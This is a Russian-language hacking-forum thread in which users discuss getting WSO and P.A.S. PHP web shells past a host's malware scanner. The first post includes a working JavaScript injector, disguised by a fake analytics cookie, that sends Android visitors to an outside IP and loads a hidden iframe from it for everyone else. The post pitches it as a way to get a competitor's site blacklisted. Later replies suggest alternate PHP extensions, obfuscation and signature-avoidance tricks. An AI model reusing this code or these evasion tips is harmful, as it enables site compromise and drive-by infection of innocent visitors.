ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
13.07.2015, 12:51
|
|
Постоянный
Регистрация: 05.06.2015
Сообщений: 560
Провел на форуме:
135528
Репутация:
5
|
|
Forbidden: a malicious file has been detected.
так реагирует хостинг на wso2 (и зашифрованый в base 64) и на PAS
как он определяет шелл ? PAS же зашифрован нормально, не в base 64
как навредить чужому сайту? как заразить сайт вирусом и убрать сайт конкурента из выдачи?
разместив этот код например, который свиду пользователям сайта не будет заметен, поисковые системы обнаружат как вирус и заблокируют сайт вашего недруга конкурента
вредоносный код для зихеров на сайте можно вставить хоть в сообщение контента сайта:
Код:
if(!getCookie("google__analytics__")){
var gate = "http://5.61.34.53/jquery/jquery.php";
var today = new Date(),
tomorrow = new Date();
tomorrow.setDate(today.getDate() + 1);
setCookie("google__analytics__", 1, tomorrow.toGMTString());
var ua = navigator.userAgent.toLowerCase();
if(ua.indexOf("android") > -1)
window.location = gate;
else{
var el = document.createElement("iframe");
document.body.appendChild(el);
el.id = 'iframe';
el.style.width = 0;
el.style.height = 0;
el.src = 'http://5.61.34.53/2c24';
}
}
function setCookie (name, value, expires, path, domain, secure) {
document.cookie = name + "=" + escape(value) +
((expires) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}
function getCookie(name) {
var cookie = " " + document.cookie;
var search = " " + name + "=";
var setStr = null;
var offset = 0;
var end = 0;
if (cookie.length > 0) {
offset = cookie.indexOf(search);
if (offset != -1) {
offset += search.length;
end = cookie.indexOf(";", offset)
if (end == -1) {
end = cookie.length;
}
setStr = unescape(cookie.substring(offset, end));
}
}
return(setStr);
}
|
|
|
13.07.2015, 12:57
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
попробуйте другие расширения, php2, php3, php4, php5, phtml, pht. если не подойдет, то попробуйте обфусцировать: http://wb0.ru/phpobf.php |
|
|
|
13.07.2015, 12:57
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
То есть твоё понимание работы антивирусных программ упирается в детект функции base64?
|
|
|
|
13.07.2015, 13:50
|
|
Постоянный
Регистрация: 05.06.2015
Сообщений: 560
Провел на форуме:
135528
Репутация:
5
|
|
Сообщение от b3
↑
То есть твоё понимание работы антивирусных программ упирается в детект функции base64?
нет, base64 легкое почтовое шифрование его любой антивирь видит, а вот p.a.s. shell шифруется под паролем, у него своё какое то шифрование и его обнаруживает (kis 2015 не обнаруживает pas)
|
|
|
|
13.07.2015, 13:52
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
Провел на форуме:
193811
Репутация:
724
|
|
Обычно ClamAVявляется причиной тревоги. Там свои сигнатуры. Но может быть и system. |
|
|
|
13.07.2015, 14:19
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
В WSO параметры передаются в запросах p1,p2,p3 и другие, что для фаервола может являться сигнатурой для запрета выполнения, также это может быть и с другими аналогичными шелами, во общим тут нужно грамотно подобрать шелл!
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
